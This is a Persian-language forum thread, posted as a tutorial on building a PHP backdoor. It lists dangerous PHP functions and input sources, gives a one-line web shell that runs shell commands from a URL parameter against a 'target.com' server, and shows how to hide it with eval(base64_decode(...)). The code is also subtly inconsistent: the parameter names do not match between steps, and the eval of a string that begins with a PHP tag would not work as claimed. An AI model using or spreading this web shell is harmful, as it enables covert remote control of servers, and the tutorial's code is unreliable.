SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

ساخت در پشتی در PHP

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    ساخت در پشتی در PHP

    سلام
    =====
    در این آموزش کوچک شما دوستان عزیز را را نحوه ساخت یک در پشتی به زبان PHP آشنا خواهم کرد . . .

    تعریف اول :
    ابتدا باید بدونیم که از چه فانکشن های می تونیم استفاده کنیم ! در زیر قرار دادم :
    1-اجرای یک برنامه خارجی با فانکشن :
    کد:
    System();
    کد:
     Exec();
    2-باز کردن فایل از سیستم :
    کد:
    Fopen();
    3-صدا زدن(فراخوانی) با :
    کد:
    Include();
    4-اجرا کد PHP:
    کد:
    Eval();
    تعریف دوم :
    انواع روش های دریافت ورودی :
    1-در یافت ورودی با متد گت :
    کد:
    $_GET['var']
    به شکل :
    کد:
    http://site.com/file.php?var=command
    2-متد پست :
    کد:
     $_POST['var']
    با استفاده از ابزار :
    کد:
    LiveHTTPHeaders can be used
    3-در یافت ورودی از کوکی مرورگر :
    کد:
    $_COOKIE['var']
    تعریف 3 :
    دو روش معمول کد کرد ن :
    1-Base64 encoding به صورت :
    کد:
    base64_encode()
    2- Encode shellcode به صورت :
    کد:
    "\xDE\xAD\xBE\xEF"
    تا اینجا فعلا بسه یکم در باره فانکشن های که گفتم سرچ کنید مطالب دستون بیاد انشالله در پست بعدی ادامه میدم ...

    [align=center]یــا عـــلـــی [/align]
     شیر برای اثبات شیر بودنش , نیازی به جنگیدن با هر شغالی را ندارد . تنها نیم نگاهش کافیست ...
    برچسب ها: هیچ یک
  • #2
    RE: ساخت در پشتی در PHP

    سلام
    =====
    خوب دوستان امید وارم در مورد مطالب گفته شده سرچ کرده باشید !
    بریم سر ادامه مطلب . .

    در این بخش با استفاده از 3 متد زیر یک بک دور ساده می سازیم
    کد:
    system() + $_GET[] + base64_encode()
    خوب قبل از اینکد کردن ابتدا کد زیر رو می نویسم
    کد:
     <?php system($_GET['v30sharp']); ?>
    همان طور که مشاهده میکنید یک کد بسیار ساده می باشد کد بالا را با فرمت phpذخیره کرده و اجرا کنید نحوه اجرا به صورت زیر می باشد :
    کد:
    http://target.com/backdoor.php?v30sharp=ls -la
    با اجرا دستور بالا در urlلیست دایرکتوری ها به همراه جزییات را مشاهده خواهید کرد
    عکس

    خوب حالا ما بدون استفاده از ابزار تنها با استفاده از توابع phpکد بالا را به بیس 64 اینکد می کنیم:
    کد:
    <?php
$var = "system(\$_GET['s3cr3t']);"; // $ needs to be escaped.
echo base64_encode($var);
?>
    اگر کد بالا را در یک فایل phpسیو کرده و اجرا کنیم خروجی به شکل زیر به ما خواهد داد :
    کد:
    PD9waHAgc3lzdGVtKCRfR0VUWyd2MzBzaGFycCddKTsgPz4=
    این عبارت رمز شده دستور :
    کد:
    <?php system($_GET['v30sharp']); ?>
    می باشد که با جا گذاری عبارت رمز شده در کد زیر
    کد:
     <?php
eval(base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWyd2MzBzaGFycCddKTsgPz4="));
?>
    همان عمل کرد کد :
    کد:
    <?php system($_GET['v30sharp']); ?>
    را دارد فقط تنها تفاوت ان رمز شده کد می باشد

    خوب اینم ساختن یک بک دور ساده در پست های بعدی تا حدودی این کد را گسترش خواهیم داد

    موفق و سربلند باشید
     شیر برای اثبات شیر بودنش , نیازی به جنگیدن با هر شغالی را ندارد . تنها نیم نگاهش کافیست ...

    نظر

    قبلی template بعدی
    صبر کنید ..
    X